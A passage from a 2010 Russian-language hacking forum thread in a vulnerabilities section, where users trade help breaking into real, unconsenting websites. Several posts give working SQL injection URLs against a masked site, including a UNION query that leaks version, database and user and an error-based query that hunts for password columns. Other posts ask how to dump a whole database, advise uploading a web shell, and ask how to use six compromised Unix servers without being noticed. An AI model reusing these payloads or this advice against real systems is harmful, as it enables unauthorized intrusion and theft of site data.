HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.01.2010, 12:42
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
По умолчанию

Цитата:
Сообщение от erolom  
Такая ситуация есть сайт со скулей,но стоит лимит на вывод , БД довольнотаки большая , есть ли у кого мысли как сразу всё слить?шелл пока что не удалось залить =/
использовать GROUP_CONCAT()
лучше вариантов вроде нету.
https://forum.antichat.ru/showthread.php?t=118842
 
Ответить с цитированием

  #2  
Старый 27.01.2010, 19:20
NeKit
Новичок
Регистрация: 29.12.2008
Сообщений: 4
Провел на форуме:
15341

Репутация: 0
По умолчанию

Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?
 
Ответить с цитированием

  #3  
Старый 27.01.2010, 19:31
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от NeKit  
Сообственно один сайт инклудит страницу в iframe. Возможно ли как-то при помощи JavaScript'a модифицировать внешний вид того сайта, что инклудит? И что вообще можно сделать?
Как ты думаешь на чей стороне сработает джава скрипт на стороне сервера или клиента?
---
что ты хочешь вообще сделать?. если модифицировать сайт- не мудри давай заливай шелл

почитай книгу Кузи в избранном.
 
Ответить с цитированием

  #4  
Старый 27.01.2010, 19:46
NeKit
Новичок
Регистрация: 29.12.2008
Сообщений: 4
Провел на форуме:
15341

Репутация: 0
По умолчанию

Цитата:
Сообщение от xcedz  
Как ты думаешь на чей стороне сработает джава скрипт на стороне сервера или клиента?
Клиента конечно. Так и модифицировать на стороне клиента.
 
Ответить с цитированием

  #5  
Старый 27.01.2010, 21:38
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
Провел на форуме:
324402

Репутация: 22
По умолчанию

Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.
 
Ответить с цитированием

  #6  
Старый 27.01.2010, 22:30
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
Провел на форуме:
282022

Репутация: 4
По умолчанию

хелп, помогите победить
Код:
http://xxx/browse.php?cat=999999999'+union+select+1,2,3,4,5,6+--+

Последний раз редактировалось Gidz; 27.01.2010 в 22:55..
 
Ответить с цитированием

  #7  
Старый 27.01.2010, 22:38
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333 ,concat_ws(0x2F,version(),database(),user()),555,6 66--+

В сурсе
Цитата:
<p align='center'>The directory you requested could not be found. If you believe this is a bug, please contact <a href='mailto:?subject=Dir Not Found: /files/5.0.51b-log/fusion/fusion@ginger'>sir</a>.</p>

Последний раз редактировалось ElteRUS; 27.01.2010 в 22:54..
 
Ответить с цитированием

  #8  
Старый 27.01.2010, 22:58
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074

Репутация: 257
По умолчанию

http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--++

ну или так, если ты не хочешь колупать сорцы. ps. кури ману.

Последний раз редактировалось v1d0qz; 27.01.2010 в 23:03..
 
Ответить с цитированием

  #9  
Старый 28.01.2010, 12:15
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
По умолчанию

Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.
 
Ответить с цитированием

  #10  
Старый 28.01.2010, 12:35
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
По умолчанию

2kfor
https://forum.antichat.ru/nextnewesttothread56632.html
http://forum.antichat.ru/thread45790.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.